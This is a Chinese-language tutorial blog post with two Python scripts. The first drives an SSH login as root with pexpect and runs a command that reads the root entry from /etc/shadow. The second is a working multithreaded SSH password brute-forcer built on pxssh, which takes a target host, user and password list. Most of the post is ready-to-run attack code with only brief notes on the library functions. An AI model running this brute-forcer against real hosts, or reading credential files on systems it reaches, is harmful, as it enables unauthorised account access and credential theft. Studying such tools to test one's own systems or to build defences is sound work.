Pexpect 模塊登陸ssh以及pxssh模塊暴力破解ssh密碼

利用Pexpect模塊交互

這裏centos系統

代碼

# -*- coding: utf-8 -*-
# @Author  : Lan126

import pexpect

PROMPT = ["# ", ">>> ", "> ", "\$ "]


def connect(user, host, password):
    ssh_newkey = "Are you sure you want to continue connecting"
    connStr = "ssh " + user + "@" + host
    child = pexpect.spawn(connStr)
    ret = child.expect([pexpect.TIMEOUT, ssh_newkey, "[p|P]assword:"])
    if ret == 0:
        print("[-] Error Connecting")
        return
    if ret == 1:
        child.sendline("yes")
        ret = child.expect([pexpect.TIMEOUT, "[p|P]assword:"])
        if ret == 0:
            print("[-] Error Connecting")
            return
    child.sendline(password)
    child.expect(PROMPT)
    return child


def send_command(child, cmd):
    child.sendline(cmd)
    child.expect(PROMPT)
    print((child.before).encode("utf-8"))


def main():
    host = "localhost"
    user = "root"
    password = "*************************"
    child = connect(user, host, password)
    send_command(child, "cat /etc/shadow | grep root")


if __name__ == "__main__":
    main()

結果圖

細節

下面是從Pexpect文檔中複製的一句話基本上能夠歸納這一個腳本的全部知識點了

There are two important methods in Pexpect – expect() and send() (or sendline() which is like send() with a linefeed).
The expect() method waits for the child application to return a given string. The string you specify is a regular expression,
so you can match complicated patterns. The send() method writes a string to the child application.
From the child’s point of view it looks just like someone typed the text from a terminal.
After each call to expect() the before and after properties will be set to the text printed by child application.
The before property will contain all text up to the expected string pattern. The after string will contain the text that was matched by the expected pattern

spawnclass的做用以下

This is the main class interface for Pexpect. Use this class to start and control child applications.

---

利用pxssh暴力破解ssh密碼

這裏也是centos系統

代碼

# -*- coding: utf-8 -*-
# @Author  : Lan126

import optparse
from pexpect import pxssh
import time
from threading import *

maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
Found = False
Fails = 0


def connect(host, user, password, release):
    global Found
    global Fails
    try:
        s = pxssh.pxssh()
        s.login(host, user, password)
        print("[+] Password Found " + password)
        Found = True
    except Exception as e:
        if "read_nonblocking" in str(e):
            Fails += 1
            time.sleep(5)
            connect(host, user, password, False)
        elif "synchronize with original prompt" in str(e):
            time.sleep(1)
            connect(host, user, password, False)
    finally:
        if release:
            connection_lock.release()


def main():
    parser = optparse.OptionParser("usage%prog" + "-H <target host> -u <user> -F <password list>")
    parser.add_option("-H", dest="tgtHost", type="string", help="specify target host")
    parser.add_option("-u", dest="user", type="string", help="specify the user")
    parser.add_option("-F", dest="passwordFile", type="string", help="specify password file")
    options, args = parser.parse_args()
    host = options.tgtHost
    passwdFile = options.passwordFile
    user = options.user
    if host is None or passwdFile is None or user is None:
        print(parser.usage)
        exit(0)
    fn = open(passwdFile, "r")
    for line in fn.readlines():
        if Found:
            # 若是發現了密碼就退出
            print("[*] Exiting: Password Found")
            exit(0)
        if Fails > 5:
            print("[!] Too Many Socket Timeouts")
            exit(0)
        connection_lock.acquire()
        password = line.strip("\r").strip("\n")
        print("[-] Testing: " + str(password))
        t = Thread(target=connect, args=(host, user, password, True))
        t.start()


if __name__ == "__main__":
    main()

結果圖

細節

這其實也是上面那個腳本的更高級的封裝不過就是加了一個讀取密碼文件的過程而已
這一個腳本的知識點有全局變量,信號量,以及pxssh模塊的使用,它能夠直接用login()等函數與ssh交互
BoundedSemaphore類瞭解一下

A bounded semaphore implementation. Inherit from Semaphore.
This raises ValueError in release() if it would increase the value above the initial value.